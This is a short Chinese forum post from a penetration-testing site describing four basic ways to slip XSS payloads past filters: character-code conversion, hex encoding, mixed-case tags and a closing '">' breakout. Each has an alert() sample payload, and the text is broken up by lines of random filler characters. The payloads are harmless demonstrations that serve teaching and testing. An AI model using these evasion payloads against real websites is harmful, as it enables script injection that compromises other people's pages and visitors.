中国网络渗透测试联盟
标题:
XSS 绕过技术
[打印本页]
作者:
admin
时间:
2013-2-14 00:10
标题:
XSS 绕过技术
四种超级基础的绕过方法。
6 C" u3 }# B/ u% _) E& \
1.转换为ASCII码
8 X. O" b6 h8 N# H2 R9 k6 p
例子:原脚本为<script>alert(‘I love F4ck’)</script >
. Y, ]- J; H9 J( D& q9 ]% r
通过转换,变成:
% T7 l+ r* q" a# p2 U" j: h0 y. s
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
' X$ c3 P) }1 t2 U8 V) i% u% w
9 `: E* O" e7 z. r) x" J! l
2.转换为HEX(十六进制)
5 P/ s+ T7 G; e4 ^
例子:原脚本为<script>alert(‘I love F4ck’)</script>
5 K( `6 N; y* P
通过转换,变成:
9 x9 M$ [* n" b% V+ Q. Z
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
0 i, H' {9 F4 T* g
9 c( I! N" I4 \7 I8 @( _& |
3.转换脚本的大小写
' o, a2 g. `2 A! U a
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( p' Z& L) P9 t+ k. a
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
+ A3 X! ~" [3 ^! O v1 j8 v
+ h" m4 Z @' u8 M0 b
4.增加闭合标记”>
+ S" ^8 q3 Q/ | E- o# X
例子:原脚本为<script>alert(‘I love F4ck’)</script>
0 S* u2 G3 m3 ~- J4 A, S: z8 W
转换为:”><script>alert(‘I love F4ck’)</script>
# G( k% Q. |( j
更详细绕过技术请参考此网页
6 h! K; B( B7 K
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
, _/ f: P+ ^# x1 ]
" u4 f6 w$ h/ _+ Z
转换工具使用的是火狐的 hackbar mozilla addon.
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2